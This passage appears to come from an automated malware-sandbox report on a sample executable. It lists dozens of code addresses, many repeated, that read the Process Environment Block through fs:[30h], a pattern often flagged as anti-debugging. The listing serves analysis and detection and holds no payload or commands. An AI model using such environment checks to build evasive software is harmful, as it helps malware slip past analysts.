Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h] 1_2_011A2000
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h] 1_2_011A2000
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h] 1_2_011A2000
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h] 1_2_011A2000
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h] 1_2_011A2000
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h] 1_2_011A2000
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h] 1_2_011A2000
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h] 1_2_011A2000
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01196030 mov eax, dword ptr fs:[00000030h] 1_2_01196030
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FA020 mov eax, dword ptr fs:[00000030h] 1_2_010FA020
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FC020 mov eax, dword ptr fs:[00000030h] 1_2_010FC020
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01102050 mov eax, dword ptr fs:[00000030h] 1_2_01102050
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01186050 mov eax, dword ptr fs:[00000030h] 1_2_01186050
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112C073 mov eax, dword ptr fs:[00000030h] 1_2_0112C073
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110208A mov eax, dword ptr fs:[00000030h] 1_2_0110208A
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C60B8 mov eax, dword ptr fs:[00000030h] 1_2_011C60B8
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C60B8 mov ecx, dword ptr fs:[00000030h] 1_2_011C60B8
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010F80A0 mov eax, dword ptr fs:[00000030h] 1_2_010F80A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011980A8 mov eax, dword ptr fs:[00000030h] 1_2_011980A8
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011820DE mov eax, dword ptr fs:[00000030h] 1_2_011820DE
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011420F0 mov ecx, dword ptr fs:[00000030h] 1_2_011420F0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FA0E3 mov ecx, dword ptr fs:[00000030h] 1_2_010FA0E3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011860E0 mov eax, dword ptr fs:[00000030h] 1_2_011860E0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011080E9 mov eax, dword ptr fs:[00000030h] 1_2_011080E9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FC0F0 mov eax, dword ptr fs:[00000030h] 1_2_010FC0F0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01120310 mov ecx, dword ptr fs:[00000030h] 1_2_01120310
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113A30B mov eax, dword ptr fs:[00000030h] 1_2_0113A30B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113A30B mov eax, dword ptr fs:[00000030h] 1_2_0113A30B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113A30B mov eax, dword ptr fs:[00000030h] 1_2_0113A30B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FC310 mov ecx, dword ptr fs:[00000030h] 1_2_010FC310
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D8324 mov eax, dword ptr fs:[00000030h] 1_2_011D8324
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D8324 mov ecx, dword ptr fs:[00000030h] 1_2_011D8324
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D8324 mov eax, dword ptr fs:[00000030h] 1_2_011D8324
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D8324 mov eax, dword ptr fs:[00000030h] 1_2_011D8324
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118035C mov eax, dword ptr fs:[00000030h] 1_2_0118035C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118035C mov eax, dword ptr fs:[00000030h] 1_2_0118035C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118035C mov eax, dword ptr fs:[00000030h] 1_2_0118035C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118035C mov ecx, dword ptr fs:[00000030h] 1_2_0118035C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118035C mov eax, dword ptr fs:[00000030h] 1_2_0118035C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118035C mov eax, dword ptr fs:[00000030h] 1_2_0118035C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A8350 mov ecx, dword ptr fs:[00000030h] 1_2_011A8350
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CA352 mov eax, dword ptr fs:[00000030h] 1_2_011CA352
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01182349 mov eax, dword ptr fs:[00000030h] 1_2_01182349
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D634F mov eax, dword ptr fs:[00000030h] 1_2_011D634F
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A437C mov eax, dword ptr fs:[00000030h] 1_2_011A437C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FE388 mov eax, dword ptr fs:[00000030h] 1_2_010FE388
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FE388 mov eax, dword ptr fs:[00000030h] 1_2_010FE388
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FE388 mov eax, dword ptr fs:[00000030h] 1_2_010FE388
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010F8397 mov eax, dword ptr fs:[00000030h] 1_2_010F8397
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010F8397 mov eax, dword ptr fs:[00000030h] 1_2_010F8397
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010F8397 mov eax, dword ptr fs:[00000030h] 1_2_010F8397
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112438F mov eax, dword ptr fs:[00000030h] 1_2_0112438F
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112438F mov eax, dword ptr fs:[00000030h] 1_2_0112438F
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AE3DB mov eax, dword ptr fs:[00000030h] 1_2_011AE3DB
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AE3DB mov eax, dword ptr fs:[00000030h] 1_2_011AE3DB
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AE3DB mov ecx, dword ptr fs:[00000030h] 1_2_011AE3DB
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AE3DB mov eax, dword ptr fs:[00000030h] 1_2_011AE3DB
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A43D4 mov eax, dword ptr fs:[00000030h] 1_2_011A43D4
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A43D4 mov eax, dword ptr fs:[00000030h] 1_2_011A43D4
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0110A3C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0110A3C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0110A3C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0110A3C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0110A3C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0110A3C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011083C0 mov eax, dword ptr fs:[00000030h] 1_2_011083C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011083C0 mov eax, dword ptr fs:[00000030h] 1_2_011083C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011083C0 mov eax, dword ptr fs:[00000030h] 1_2_011083C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011083C0 mov eax, dword ptr fs:[00000030h] 1_2_011083C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011BC3CD mov eax, dword ptr fs:[00000030h] 1_2_011BC3CD
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011863C0 mov eax, dword ptr fs:[00000030h] 1_2_011863C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0111E3F0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0111E3F0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0111E3F0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011363FF mov eax, dword ptr fs:[00000030h] 1_2_011363FF
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h] 1_2_011103E9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h] 1_2_011103E9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h] 1_2_011103E9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h] 1_2_011103E9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h] 1_2_011103E9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h] 1_2_011103E9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h] 1_2_011103E9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h] 1_2_011103E9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010F823B mov eax, dword ptr fs:[00000030h] 1_2_010F823B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D625D mov eax, dword ptr fs:[00000030h] 1_2_011D625D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01106259 mov eax, dword ptr fs:[00000030h] 1_2_01106259
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011BA250 mov eax, dword ptr fs:[00000030h] 1_2_011BA250
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011BA250 mov eax, dword ptr fs:[00000030h] 1_2_011BA250
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01188243 mov eax, dword ptr fs:[00000030h] 1_2_01188243
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01188243 mov ecx, dword ptr fs:[00000030h] 1_2_01188243
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FA250 mov eax, dword ptr fs:[00000030h] 1_2_010FA250
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010F826B mov eax, dword ptr fs:[00000030h] 1_2_010F826B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h] 1_2_011B0274
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h] 1_2_011B0274
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h] 1_2_011B0274
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h] 1_2_011B0274
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h] 1_2_011B0274
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h] 1_2_011B0274
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h] 1_2_011B0274
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h] 1_2_011B0274
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h] 1_2_011B0274
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h] 1_2_011B0274
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h] 1_2_011B0274
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h] 1_2_011B0274
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01104260 mov eax, dword ptr fs:[00000030h] 1_2_01104260
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01104260 mov eax, dword ptr fs:[00000030h] 1_2_01104260
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01104260 mov eax, dword ptr fs:[00000030h] 1_2_01104260
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113E284 mov eax, dword ptr fs:[00000030h] 1_2_0113E284
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113E284 mov eax, dword ptr fs:[00000030h] 1_2_0113E284
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01180283 mov eax, dword ptr fs:[00000030h] 1_2_01180283
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01180283 mov eax, dword ptr fs:[00000030h] 1_2_01180283
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01180283 mov eax, dword ptr fs:[00000030h] 1_2_01180283
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011102A0 mov eax, dword ptr fs:[00000030h] 1_2_011102A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011102A0 mov eax, dword ptr fs:[00000030h] 1_2_011102A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h] 1_2_011962A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011962A0 mov ecx, dword ptr fs:[00000030h] 1_2_011962A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h] 1_2_011962A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h] 1_2_011962A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h] 1_2_011962A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h] 1_2_011962A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D62D6 mov eax, dword ptr fs:[00000030h] 1_2_011D62D6
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0110A2C3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0110A2C3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0110A2C3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0110A2C3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0110A2C3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011102E1 mov eax, dword ptr fs:[00000030h] 1_2_011102E1
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011102E1 mov eax, dword ptr fs:[00000030h] 1_2_011102E1
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011102E1 mov eax, dword ptr fs:[00000030h] 1_2_011102E1
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01196500 mov eax, dword ptr fs:[00000030h] 1_2_01196500
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h] 1_2_011D4500
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h] 1_2_011D4500
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h] 1_2_011D4500
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h] 1_2_011D4500
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h] 1_2_011D4500
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h] 1_2_011D4500
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h] 1_2_011D4500
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110535 mov eax, dword ptr fs:[00000030h] 1_2_01110535
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110535 mov eax, dword ptr fs:[00000030h] 1_2_01110535
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110535 mov eax, dword ptr fs:[00000030h] 1_2_01110535
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110535 mov eax, dword ptr fs:[00000030h] 1_2_01110535
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110535 mov eax, dword ptr fs:[00000030h] 1_2_01110535
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110535 mov eax, dword ptr fs:[00000030h] 1_2_01110535
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h] 1_2_0112E53E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h] 1_2_0112E53E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h] 1_2_0112E53E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h] 1_2_0112E53E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h] 1_2_0112E53E
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01108550 mov eax, dword ptr fs:[00000030h] 1_2_01108550
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01108550 mov eax, dword ptr fs:[00000030h] 1_2_01108550
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113656A mov eax, dword ptr fs:[00000030h] 1_2_0113656A
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113656A mov eax, dword ptr fs:[00000030h] 1_2_0113656A
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113656A mov eax, dword ptr fs:[00000030h] 1_2_0113656A
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113E59C mov eax, dword ptr fs:[00000030h] 1_2_0113E59C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01102582 mov eax, dword ptr fs:[00000030h] 1_2_01102582
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01102582 mov ecx, dword ptr fs:[00000030h] 1_2_01102582
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01134588 mov eax, dword ptr fs:[00000030h] 1_2_01134588
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011245B1 mov eax, dword ptr fs:[00000030h] 1_2_011245B1
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011245B1 mov eax, dword ptr fs:[00000030h] 1_2_011245B1
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011805A7 mov eax, dword ptr fs:[00000030h] 1_2_011805A7
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011805A7 mov eax, dword ptr fs:[00000030h] 1_2_011805A7
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011805A7 mov eax, dword ptr fs:[00000030h] 1_2_011805A7
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011065D0 mov eax, dword ptr fs:[00000030h] 1_2_011065D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113A5D0 mov eax, dword ptr fs:[00000030h] 1_2_0113A5D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113A5D0 mov eax, dword ptr fs:[00000030h] 1_2_0113A5D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113E5CF mov eax, dword ptr fs:[00000030h] 1_2_0113E5CF
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113E5CF mov eax, dword ptr fs:[00000030h] 1_2_0113E5CF
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011025E0 mov eax, dword ptr fs:[00000030h] 1_2_011025E0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0112E5E7
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0112E5E7
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0112E5E7
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0112E5E7
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0112E5E7
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0112E5E7
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0112E5E7
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0112E5E7
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113C5ED mov eax, dword ptr fs:[00000030h] 1_2_0113C5ED
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113C5ED mov eax, dword ptr fs:[00000030h] 1_2_0113C5ED
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01138402 mov eax, dword ptr fs:[00000030h] 1_2_01138402
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01138402 mov eax, dword ptr fs:[00000030h] 1_2_01138402
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01138402 mov eax, dword ptr fs:[00000030h] 1_2_01138402
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FC427 mov eax, dword ptr fs:[00000030h] 1_2_010FC427
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FE420 mov eax, dword ptr fs:[00000030h] 1_2_010FE420
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FE420 mov eax, dword ptr fs:[00000030h] 1_2_010FE420
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FE420 mov eax, dword ptr fs:[00000030h] 1_2_010FE420
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01186420 mov eax, dword ptr fs:[00000030h] 1_2_01186420
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01186420 mov eax, dword ptr fs:[00000030h] 1_2_01186420
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01186420 mov eax, dword ptr fs:[00000030h] 1_2_01186420
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01186420 mov eax, dword ptr fs:[00000030h] 1_2_01186420
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01186420 mov eax, dword ptr fs:[00000030h] 1_2_01186420
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01186420 mov eax, dword ptr fs:[00000030h] 1_2_01186420
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01186420 mov eax, dword ptr fs:[00000030h] 1_2_01186420
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112245A mov eax, dword ptr fs:[00000030h] 1_2_0112245A
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011BA456 mov eax, dword ptr fs:[00000030h] 1_2_011BA456
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h] 1_2_0113E443
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h] 1_2_0113E443
